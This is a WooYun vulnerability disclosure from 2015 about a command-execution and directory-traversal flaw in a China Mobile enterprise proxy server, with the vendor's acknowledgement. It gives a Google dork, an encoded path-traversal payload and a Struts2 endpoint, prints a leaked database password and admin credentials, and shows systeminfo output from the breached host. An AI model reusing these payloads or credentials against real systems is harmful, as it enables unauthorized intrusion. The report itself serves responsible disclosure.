漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0163911
漏洞标题:中国移动某系统存在漏洞
相关厂商:中国移动
漏洞作者: 陆由乙
提交时间:2015-12-23 19:18
修复时间:2016-02-09 23:29
公开时间:2016-02-09 23:29
漏洞类型:命令执行
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-12-23: 细节已通知厂商并且等待厂商处理中
2015-12-27: 厂商已经确认,细节仅向厂商公开
2016-01-06: 细节向核心白帽子及相关领域专家公开
2016-01-16: 细节向普通白帽子公开
2016-01-26: 细节向实习白帽子公开
2016-02-09: 细节向公众公开
简要描述:
.。。。。。。。
详细说明:
企业代理服务器--中国移动
目录历遍:**.**.**.**/mms/
google:intitle:企业代理服务器--中国移动
**.**.**.**/%c0%ae/WEB-INF/monitor.xml
http://**.**.**.**/%c0%ae/WEB-INF/monitor.xml
**.**.**.**/%c0%ae/WEB-INF/monitor.xml
**.**.**.**/%c0%ae//WEB-INF/monitor.xml
还有一个st2.
**.**.**.**:8088/MAS/randomImageAction.action
HWdbIP=**.**.**.**
HWdbIP=**.**.**.**
HWdbName=CustomSMS
HWdbPassword=SqlMsde@InfoxEie2000
HWsourceAddr=106573165037
HWserviceID=MHE0010501
HWfeeType=02
HWfeeCode=20
HWUserName=admin
HWpassword=2552027+2554034
DestinationAddress=106573165037+admin
漏洞证明:
24H,8G这个开了3个月的机了,也不歇歇。
不愧是移动,一台主机占这么多IP。
C:\Users\admin$>systeminfo
主机名: WIN-4ASJL16FS7D
OS 名称: Microsoft Windows Server 2008 R2 Enterprise
OS 版本: 6.1.7600 暂缺 Build 7600
OS 制造商: Microsoft Corporation
OS 配置: 独立服务器
OS 构件类型: Multiprocessor Free
注册的所有人: Windows 用户
注册的组织:
产品 ID: 55041-266-0003407-84898
初始安装日期: 2015/8/31, 15:13:03
系统启动时间: 2015/9/7, 8:58:38
系统制造商: HP
系统型号: ProLiant DL385 G7
系统类型: x64-based PC
处理器: 安装了 2 个处理器。
[01]: AMD64 Family 16 Model 9 Stepping 1 AuthenticAMD ~2100 M
z
[02]: AMD64 Family 16 Model 9 Stepping 1 AuthenticAMD ~2100 M
z
BIOS 版本: HP A18, 2010/6/15
Windows 目录: C:\Windows
系统目录: C:\Windows\system32
启动设备: \Device\HarddiskVolume1
系统区域设置: zh-cn;中文(中国)
输入法区域设置: zh-cn;中文(中国)
时区: (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量: 8,188 MB
可用的物理内存: 618 MB
虚拟内存: 最大值: 16,374 MB
虚拟内存: 可用: 3,458 MB
虚拟内存: 使用中: 12,916 MB
页面文件位置: C:\pagefile.sys
域: WORKGROUP
登录服务器: \\WIN-4ASJL16FS7D
修补程序: 暂缺
网卡: 安装了 4 个 NIC。
[01]: Broadcom BCM5709C NetXtreme II GigE (NDIS VBD 客户端)
连接名: 本地连接
启用 DHCP: 否
IP 地址
[01]: **.**.**.**
[02]: **.**.**.**
[03]: **.**.**.**
[04]: **.**.**.**
[05]: **.**.**.**
[06]: **.**.**.**
[07]: **.**.**.**
[08]: **.**.**.**
[09]: **.**.**.**
[10]: **.**.**.**
[11]: **.**.**.**
[12]: **.**.**.**
[13]: **.**.**.**
[14]: **.**.**.**
[15]: **.**.**.**
[16]: **.**.**.**
[17]: **.**.**.**
[18]: **.**.**.**
[19]: **.**.**.**
[20]: **.**.**.**
[21]: **.**.**.**
[22]: **.**.**.**
[23]: **.**.**.**
[24]: **.**.**.**
[25]: **.**.**.**
[26]: **.**.**.**
[27]: **.**.**.**
[28]: **.**.**.**
[29]: **.**.**.**
[30]: **.**.**.**
[31]: **.**.**.**
[32]: **.**.**.**
[33]: **.**.**.**
[34]: **.**.**.**
[35]: **.**.**.**
[36]: **.**.**.**
[37]: **.**.**.**
[38]: **.**.**.**
[39]: **.**.**.**
[40]: **.**.**.**
[41]: **.**.**.**
[42]: **.**.**.**
[43]: **.**.**.**
[44]: **.**.**.**
[45]: **.**.**.**
[46]: **.**.**.**
[47]: **.**.**.**
[48]: **.**.**.**
[49]: **.**.**.**
[50]: **.**.**.**
[51]: **.**.**.**
[52]: **.**.**.**
[53]: **.**.**.**
[54]: **.**.**.**
[55]: **.**.**.**
[56]: **.**.**.**
[57]: **.**.**.**
[58]: **.**.**.**
[59]: **.**.**.**
[60]: **.**.**.**
[61]: **.**.**.**
[62]: fe80::1519:e1cb:286:6e7c
[02]: Broadcom BCM5709C NetXtreme II GigE (NDIS VBD 客户端)
连接名: 本地连接 2
状态: 媒体连接已中断
[03]: Broadcom BCM5709C NetXtreme II GigE (NDIS VBD 客户端)
连接名: 本地连接 3
状态: 媒体连接已中断
[04]: Broadcom BCM5709C NetXtreme II GigE (NDIS VBD 客户端)
连接名: 本地连接 4
状态: 媒体连接已中断
涉及各种企业。
修复方案:
。。。
版权声明:转载请注明来源 陆由乙@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:14
确认时间:2015-12-27 22:33
厂商回复:
CNVD确认所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置。
最新状态:
暂无